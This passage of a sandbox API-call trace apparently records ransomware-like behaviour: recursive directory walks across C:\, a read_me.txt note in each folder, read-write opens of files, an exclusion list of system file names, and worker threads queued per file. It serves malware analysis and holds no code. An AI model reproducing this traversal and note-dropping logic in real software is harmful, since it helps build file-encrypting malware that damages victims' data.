ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.927] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\read_me.txt") returned 27 [0073.927] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\read_me.txt" (normalized: "c:\\msocache\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0073.928] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.928] CloseHandle (hObject=0x7a4) returned 1 [0073.928] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x169903f0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.928] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0073.928] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\MSOCache\\read_me.txt") returned 27 [0073.928] GetProcessHeap () returned 0x280000 [0073.928] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ab00b8 | out: hHeap=0x280000) returned 1 [0073.928] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 28 [0073.928] GetProcessHeap () returned 0x280000 [0073.928] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a30078 | out: hHeap=0x280000) returned 1 [0073.931] GetProcessHeap () returned 0x280000 [0073.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ab00b8 [0073.932] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\*") returned 17 [0073.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0073.933] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\.") returned 17 [0073.933] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.933] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\..") returned 18 [0073.933] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="Admin", cAlternateFileName="")) returned 1 [0073.933] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin") returned 21 [0073.933] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x169903f0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.933] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\read_me.txt") returned 27 [0073.933] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\read_me.txt" (normalized: "c:\\perflogs\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0073.933] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.933] CloseHandle (hObject=0x7a4) returned 1 [0073.933] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x169903f0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.933] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0073.934] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\PerfLogs\\read_me.txt") returned 27 [0073.934] GetProcessHeap () returned 0x280000 [0073.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ab00b8 | out: hHeap=0x280000) returned 1 [0073.934] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 29 [0073.934] GetProcessHeap () returned 0x280000 [0073.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a40080 | out: hHeap=0x280000) returned 1 [0073.934] GetProcessHeap () returned 0x280000 [0073.935] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ab00b8 [0073.935] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\*") returned 23 [0073.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0073.935] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\.") returned 23 [0073.935] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.935] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\..") returned 24 [0073.935] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x169903f0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.935] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\read_me.txt") returned 33 [0073.935] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\read_me.txt" (normalized: "c:\\perflogs\\admin\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0073.935] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.935] CloseHandle (hObject=0x7a4) returned 1 [0073.935] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x169903f0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.935] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0073.935] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\read_me.txt") returned 33 [0073.935] GetProcessHeap () returned 0x280000 [0073.935] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ab00b8 | out: hHeap=0x280000) returned 1 [0073.935] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 30 [0073.935] GetProcessHeap () returned 0x280000 [0073.935] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a60090 | out: hHeap=0x280000) returned 1 [0073.935] GetProcessHeap () returned 0x280000 [0073.935] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a60090 [0073.936] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Recovery\\*") returned 17 [0073.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x169b6550, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169b6550, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0073.936] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\.") returned 17 [0073.936] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x169b6550, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169b6550, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.936] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\..") returned 18 [0073.936] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x169b6550, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169b6550, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0073.936] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 52 [0073.936] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x169b6550, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x169b6550, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169b6550, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.936] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\read_me.txt") returned 27 [0073.936] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\read_me.txt" (normalized: "c:\\recovery\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0073.936] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.936] CloseHandle (hObject=0x7a4) returned 1 [0073.936] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x169b6550, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x169b6550, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169b6550, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.936] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0073.936] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Recovery\\read_me.txt") returned 27 [0073.936] GetProcessHeap () returned 0x280000 [0073.936] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a60090 | out: hHeap=0x280000) returned 1 [0073.936] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 31 [0073.936] GetProcessHeap () returned 0x280000 [0073.936] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a50088 | out: hHeap=0x280000) returned 1 [0073.936] GetProcessHeap () returned 0x280000 [0073.936] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ab00b8 [0073.936] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*") returned 54 [0073.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x169b6550, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169b6550, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0073.937] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\.") returned 54 [0073.937] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x169b6550, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169b6550, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.937] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\..") returned 55 [0073.937] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0073.937] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0073.937] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0073.937] StrStrW (lpFirst="boot.sdi", lpSrch="read_me.txt") returned 0x0 [0073.937] StrStrW (lpFirst="boot.sdi", lpSrch="autoexec.bat") returned 0x0 [0073.937] StrStrW (lpFirst="boot.sdi", lpSrch="desktop.ini") returned 0x0 [0073.937] StrStrW (lpFirst="boot.sdi", lpSrch="autorun.inf") returned 0x0 [0073.937] StrStrW (lpFirst="boot.sdi", lpSrch="ntuser.dat") returned 0x0 [0073.937] StrStrW (lpFirst="boot.sdi", lpSrch="iconcache.db") returned 0x0 [0073.937] StrStrW (lpFirst="boot.sdi", lpSrch="bootsect.bak") returned 0x0 [0073.937] StrStrW (lpFirst="boot.sdi", lpSrch="boot.ini") returned 0x0 [0073.938] StrStrW (lpFirst="boot.sdi", lpSrch="ntuser.dat.log") returned 0x0 [0073.938] StrStrW (lpFirst="boot.sdi", lpSrch="thumbs.db") returned 0x0 [0073.938] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 3 [0073.938] QueueUserWorkItem (Function=0x404e00, Context=0x7a4, Flags=0x0) returned 1 [0073.938] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x169b6550, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x169b6550, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169b6550, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.938] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\read_me.txt") returned 64 [0073.938] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\read_me.txt" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.938] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.938] CloseHandle (hObject=0x7a8) returned 1 [0073.938] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0073.938] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0073.938] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x76c [0073.976] StrStrW (lpFirst="winre.wim", lpSrch="read_me.txt") returned 0x0 [0073.976] StrStrW (lpFirst="winre.wim", lpSrch="autoexec.bat") returned 0x0 [0073.976] StrStrW (lpFirst="winre.wim", lpSrch="desktop.ini") returned 0x0 [0073.976] StrStrW (lpFirst="winre.wim", lpSrch="autorun.inf") returned 0x0 [0073.976] StrStrW (lpFirst="winre.wim", lpSrch="ntuser.dat") returned 0x0 [0073.976] StrStrW (lpFirst="winre.wim", lpSrch="iconcache.db") returned 0x0 [0073.976] StrStrW (lpFirst="winre.wim", lpSrch="bootsect.bak") returned 0x0 [0073.976] StrStrW (lpFirst="winre.wim", lpSrch="boot.ini") returned 0x0 [0073.976] StrStrW (lpFirst="winre.wim", lpSrch="ntuser.dat.log") returned 0x0 [0073.976] StrStrW (lpFirst="winre.wim", lpSrch="thumbs.db") returned 0x0 [0073.976] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 4 [0073.976] QueueUserWorkItem (Function=0x404e00, Context=0x76c, Flags=0x0) returned 1 [0073.976] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="winre.wim", cAlternateFileName="")) returned 0 [0073.976] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0073.976] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\read_me.txt") returned 64 [0073.976] GetProcessHeap () returned 0x280000 [0073.976] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ab00b8 | out: hHeap=0x280000) returned 1 [0073.976] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 33 [0073.976] GetProcessHeap () returned 0x280000 [0073.977] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a900a8 | out: hHeap=0x280000) returned 1 [0073.977] GetProcessHeap () returned 0x280000 [0073.977] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a900a8 [0073.977] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\*") returned 14 [0073.977] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0073.977] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\.") returned 14 [0073.977] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.977] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\..") returned 15 [0073.977] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, 